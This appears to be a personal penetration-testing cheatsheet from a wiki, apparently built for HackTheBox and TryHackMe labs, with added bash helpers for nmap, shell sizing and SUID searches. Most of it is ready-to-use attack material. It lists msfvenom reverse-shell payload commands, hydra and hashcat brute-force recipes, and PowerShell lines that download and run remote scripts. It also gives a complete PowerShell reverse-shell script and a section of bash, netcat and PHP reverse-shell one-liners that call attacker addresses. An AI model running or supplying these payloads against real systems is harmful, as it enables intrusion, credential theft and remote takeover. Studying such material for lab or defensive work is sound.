OLD CheatSheet: Difference between revisions
Latest revision as of 10:31, 20 January 2022
Fix STTY in reverse shell
# In our shell: note the rows and columns values printed
stty -a
# On victim shell, fill in the values read above (without them stty prints the current settings instead of setting the size)
stty rows <rows> cols <cols>
Python
PDB (Python Debugger)
https://docs.python.org/3/library/pdb.html
# Add import pdb
import pdb
# In script, before an error message, add
pdb.set_trace()
# Example session: execution stops at the set_trace() call and drops into the (Pdb) prompt; p works in both Python 2 and 3
-> url = url.group(1)
(Pdb) p url.group(1)
http://swagshop.htb/index.php/admin/das[...]
(Pdb) continue
NMAP
Fast scan to list open ports (the high --min-rate finishes quickly but can miss ports on lossy links or knock over fragile services; rescan at a lower rate if results look thin)
nmap -p- --min-rate 10000 <target>
Scan using default scripts and list versions, output to nmap.result
nmap -sC -sV -oN nmap.result <target>
Default nmap command to run against a target (needs root; -sU on its own scans UDP only, so -sS is added to keep TCP in the same run; a full UDP port range is slow even at this rate)
nmap -sS -sU -sC -sV -p- --min-rate 10000 -oN outfile <target>
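The two commands above are usually chained: the fast sweep finds the open ports, the script/version scan is then run on only those ports. The following bash helper is an added example, not from the original cheatsheet. It parses the greppable (-oG) output of the fast sweep and builds the second command; the sample -oG file and the target 10.10.10.100 are constructed for the demo.

```bash
#!/bin/bash
# Two-pass port scan helper (added example): fast -p- sweep, then -sC -sV on
# the ports that came back open.

# Parse nmap's greppable (-oG) output and return the open TCP ports as a
# comma-separated list suitable for nmap -p. Prints nothing if none are open.
# "open|filtered" entries are deliberately not matched.
open_ports_from_gnmap() {  # $1 = path to -oG output of the fast scan
    grep -oE '[0-9]+/open/tcp' "$1" | cut -d/ -f1 | sort -un | paste -s -d ','
}

# Build the second-pass command. Returns 1 (and prints nothing) when the fast
# scan found no open ports, so callers can stop instead of scanning "-p ".
targeted_scan_cmd() {  # $1 = target, $2 = fast-scan -oG file, $3 = -oN output file
    ports=$(open_ports_from_gnmap "$2")
    [ -n "$ports" ] || return 1
    printf 'nmap -sC -sV -p %s -oN %s %s\n' "$ports" "$3" "$1"
}

# Constructed sample of what "nmap -p- --min-rate 10000 -oG fast.gnmap" writes
# (not a real capture; fields are tab-separated in real output).
SAMPLE_GNMAP=$(mktemp)
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.92 scan initiated as: nmap -p- --min-rate 10000 -oG fast.gnmap 10.10.10.100
Host: 10.10.10.100 ()	Status: Up
Host: 10.10.10.100 ()	Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/closed/tcp//http-proxy///	Ignored State: filtered (65531)
# Nmap done at Thu Jan 20 10:31:00 2022 -- 1 IP address (1 host up) scanned
EOF

# Real usage (assumed target 10.10.10.100):
#   nmap -p- --min-rate 10000 -oG fast.gnmap 10.10.10.100
#   targeted_scan_cmd 10.10.10.100 fast.gnmap full.nmap | sh
targeted_scan_cmd 10.10.10.100 "$SAMPLE_GNMAP" full.nmap
```

Piping the generated command into sh keeps the port list out of shell history and avoids retyping it; if the fast scan was rate-limited into missing ports, rerun it at a lower --min-rate before trusting the list.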
Enumerate LDAP
nmap -n -sV --script "ldap* and not brute" -p 389 dc-ip
Stabilize shell with python
python -c 'import pty;pty.spawn("/bin/bash")'
# use python3 if python is not on the target
export TERM=xterm
Background the shell with Ctrl + Z. In our terminal run stty raw -echo; fg, then set the terminal size in the victim shell as in the STTY fix above.
https://blog.aghanim.net/?p=1043
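The last step of the stabilization (and the STTY fix at the top of the page) needs the rows and columns of our own terminal typed into the victim shell. The bash helper below is an added example, not from the original page or the linked blog: it reads the `stty -a` text of our terminal and prints the exact command to paste on the victim side. The two sample `stty -a` lines are constructed.

```bash
#!/bin/bash
# Added example: derive "stty rows N cols M" for the victim from our own
# terminal's `stty -a` output.

# Extract rows and columns from `stty -a` text. GNU stty prints
# "rows 50; columns 200;", BSD/macOS stty prints "50 rows; 200 columns;";
# both forms are handled. Returns 1 if either value is missing (e.g. when
# stdin is not a terminal, where stty -a errors out).
stty_size_cmd() {  # $1 = text of `stty -a`
    rows=$(printf '%s\n' "$1" | grep -oE 'rows [0-9]+|[0-9]+ rows' | grep -oE '[0-9]+' | head -n 1)
    cols=$(printf '%s\n' "$1" | grep -oE 'columns [0-9]+|[0-9]+ columns' | grep -oE '[0-9]+' | head -n 1)
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf 'stty rows %s cols %s\n' "$rows" "$cols"
}

# Constructed samples (not real captures) of the two output styles.
LINUX_STTY_SAMPLE='speed 38400 baud; rows 50; columns 200; line = 0;'
MACOS_STTY_SAMPLE='speed 9600 baud; 50 rows; 200 columns;'

# Live use: run this in OUR terminal (stdin must be the tty), then paste the
# printed line into the victim shell after `stty raw -echo; fg` and TERM=xterm.
if [ -t 0 ]; then
    stty_size_cmd "$(stty -a)"
fi
```

Sizes only matter after the pty/raw-mode dance above; setting them on a non-pty shell does nothing. If the terminal is later resized, rerun the helper and paste the new line.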
Python
Simple HTTP server
$ python -m SimpleHTTPServer 8000
# SimpleHTTPServer is Python 2 only; the Python 3 equivalent is
$ python3 -m http.server 8000
SUID
Find SUID bit file
find / -perm -u=s -type f 2>/dev/null
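On a real box the find above returns a few dozen hits, most of them the setuid binaries every distribution ships. The bash helper below is an added example, not from the original cheatsheet: it runs the same test (-perm -4000 is equivalent to -perm -u=s) and filters out a baseline of names expected on a stock Debian/Ubuntu install, so the custom or misplaced ones stand out. The baseline list is an assumption and not exhaustive; the demo directory tree is constructed.

```bash
#!/bin/bash
# Added example: SUID hunt with a known-good baseline.

# Enumerate setuid files below a root. -xdev stays on one filesystem so /proc,
# network mounts and container overlays are skipped; errors from unreadable
# directories are discarded as on the page.
suid_find() {  # $1 = search root
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Names that are setuid on a stock Debian/Ubuntu install (assumed, not exhaustive).
# Filtering by name hides known-good NAMES, not known-good VERSIONS: an old
# build of a baseline binary still deserves a version check.
SUID_BASELINE='passwd su sudo mount umount chsh chfn gpasswd newgrp ping fusermount pkexec'

# Print only setuid files whose basename is not in the baseline: custom
# binaries, renamed shells, backup tools and the like are the first to examine.
suid_unusual() {  # $1 = search root
    suid_find "$1" | while IFS= read -r f; do
        b=${f##*/}
        case " $SUID_BASELINE " in
            *" $b "*) ;;                 # expected on a stock system
            *) printf '%s\n' "$f" ;;
        esac
    done
}

# Constructed demo tree (not a real host): two setuid files, one ordinary file.
SUID_DEMO_ROOT=$(mktemp -d)
trap 'rm -rf "$SUID_DEMO_ROOT"' EXIT
mkdir -p "$SUID_DEMO_ROOT/bin" "$SUID_DEMO_ROOT/opt"
for f in bin/passwd bin/ls opt/backup; do : > "$SUID_DEMO_ROOT/$f"; done
chmod 4755 "$SUID_DEMO_ROOT/bin/passwd" "$SUID_DEMO_ROOT/opt/backup"
chmod 0755 "$SUID_DEMO_ROOT/bin/ls"

# On a real target:  suid_unusual /
suid_unusual "$SUID_DEMO_ROOT"
```

Run the same pair of functions with -perm -2000 to cover setgid files; the baseline for those is different (crontab, ssh-agent, wall, write and friends on Debian-based systems).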
SSH Port Forward
# Synopsis
ssh -i id_rsa -L [bind_address:]port:host:hostport username@host
# Example
ssh -i id_rsa -L 8000:127.0.0.1:8000 donkeykong@10.10.10.100
Chisel
Example: forward port 8888 to attacker using chisel
# Attacker machine
chisel server -p 8000 --reverse
# Target
chisel.exe client 10.10.14.20:8000 R:8888:localhost:8888
# Connection received on attacker machine
server: proxy#1:R:0.0.0.0:8888=>localhost:8888: Listening
Hashcat
Example commands
| Attack-mode | Hash-type | Example command |
|---|---|---|
| Wordlist | $P$ | hashcat -a 0 -m 400 example400.hash example.dict |
| Wordlist + Rules | MD5 | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule |
| Brute-Force | MD5 | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a |
| Combinator | MD5 | hashcat -a 1 -m 0 example0.hash example.dict example.dict |
| Association | $1$ | hashcat -a 9 -m 500 example500.hash 1word.dict -r rules/best64.rule |
https://hashcat.net/wiki/doku.php?id=hashcat
Hydra
| Command | Description |
|---|---|
| hydra -P <wordlist> -v <ip> <protocol> | Brute force against a protocol of your choice |
| hydra -v -V -u -L <username list> -P <password list> -t 1 <ip> <protocol> | You can use Hydra to brute force usernames as well as passwords. It loops through every combination in your lists (-vV = verbose mode, showing login attempts; -u = loop over users first, which spreads attempts across accounts and reduces lockouts). |
| hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip> | Attack a Windows Remote Desktop with a password list (-f stops at the first valid pair). |
| hydra -l <username> -P <password list> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' | Craft a more specific request for Hydra to brute force; S=Location treats a redirect as success. |
https://www.tryhackme.com/room/hackpark
Msfvenom
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
Windows x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_x64_shell.exe
Stageless
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe
Staged
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > rev_shell.exe
Linux x64
msfvenom -p linux/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell-x64.elf
Linux x86
msfvenom -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell-x86.elf
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP or ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f aspx > rev_shell.aspx
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
# Other platforms
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
# the raw PHP output has its opening tag commented out, so the tag is prepended; pbcopy/pbpaste are the macOS clipboard tools
Transfer files to and from target machine
https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/
Impacket smbserver
Create an SMB server with share name "share" and the folder to share
smbserver.py share /home/aghanim/Desktop/
## If the target only speaks SMB2 (recent Windows versions disable SMB1 by default)
smbserver.py share . -smb2support
## On target CMD, run a file straight from the share
\\smbserver-ip\share\$FILE_NAME
## Copy file to target
copy \\smbserver-ip\share\$FILE_NAME .
## Copy file from target to attacker
copy FileToDownload \\smbserver-ip\share\FileToDownload
## Newer Windows builds refuse unauthenticated guest access to shares; smbserver.py also takes -username and -password, which the target can then supply with "net use"
Netcat
The nc.exe binary must already be on the target machine.
# Attacking machine command (receives the file)
nc -lvnp 4444 > FiletoDownload
## Victim machine command (-w 3 closes the connection after 3 seconds of inactivity)
nc.exe 10.10.10.100 4444 -w 3 < FiletoDownload
## Compare a hash of the file on both sides afterwards: a connection that closes early leaves a silently truncated file
Certutil
Easiest way to transfer a file to Windows (downloads over HTTP; note that certutil writes to its URL cache as well as the output file)
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
Powershell
Use single quotes around the URL. Works on Windows 7 / Server 2008 and later.
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')
Compile .C to .exe
## Create 32-bit Windows executable with:
i686-w64-mingw32-gcc -o main32.exe main.c
## Create 64-bit Windows executable with:
x86_64-w64-mingw32-gcc -o main64.exe main.c
Pivoting technique
sshuttle
# Synopsis
sshuttle [options] -r [username@]sshserver[:port]
# Example
sshuttle -r linux-admin@10.200.122.33 10.200.122.0/24
Active Directory/Windows
Enumeration CMD
https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters#domain-info
Must have valid credentials on the target.
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name (DNS form)
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller (set matches any variable starting with "log")
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs joined to the domain
net view /domain #List of PCs of the domain
nltest /dclist:<domain> #List domain controllers
net group "Domain Controllers" /domain #List computer accounts of the domain controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <username> /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trusts #Mapping of the trust relationships
Curated list of commands
psexec - Login to windows machine to get a shell
python3 psexec.py test.local/john:password123@10.10.10.1
Powershell
Fix VHDX to Hyper-V import error - outputs error "Make sure the file is uncompressed and sparse"
fsutil sparse setflag "C:\FilePath\FileName.iso" 0
Run the 64-bit PowerShell and IEX the downloaded ps1 file. The SysNative path only resolves from a 32-bit process on 64-bit Windows (e.g. a 32-bit shell), which is exactly when the plain System32 path would give the 32-bit PowerShell.
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/mini-reverse.ps1')
Run PowerShell on the target with ExecutionPolicy set to bypass
powershell.exe -nop -exec bypass
Running PowerUp.ps1 on target machine
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.17:9000/PowerUp.ps1');Invoke-AllChecks"
Downloading SharpHound.exe on target machine
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17:9000/SharpHound.exe', 'C:\Users\[...]\Desktop\SharpHound.exe')
# Execute SharpHound
./SharpHound.exe
Running PowerView.ps1 on target machine
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
Running Nishang's Invoke-PowerShellTcp
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.18:9000/shell.ps1')"
Use Invoke-WebRequest (iwr) to download and run a script. -UseBasicParsing makes the cmdlet return the response without Document Object Model (DOM) parsing; it is required where Internet Explorer is not installed, such as a Server Core installation. It is a parameter of iwr, not of iex, so it goes inside the parentheses.
iex (iwr 'http://10.10.14.9:9000/ipw.ps1' -UseBasicParsing)
Download a file and save it to location.
powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe
Mini-reverseshell.ps1
# Attacker IP and port are hard-coded on the next line; change them before hosting the script.
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
Find .NET Version using regkey
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Potatoes (token impersonation privilege escalation)
https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html
Executing MSI on Windows
msiexec /quiet /i cmd.msi
Windows Exploit Suggester
python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls
WebDav - Davtest
Scan the given WebDAV server (tests which file types can be uploaded and executed)
davtest -url http://10.10.10.15
Payloads & shells - Commands
BASH TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
## /dev/tcp is a bash feature; if the command runs under another shell, try the others: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
BASH UDP
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
Netcat Traditional
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
Netcat BusyBox
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
nc.exe
nc.exe -e cmd.exe attacker_ip attacker_port
PHP
php -r '$sock=fsockopen("10.10.14.17",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'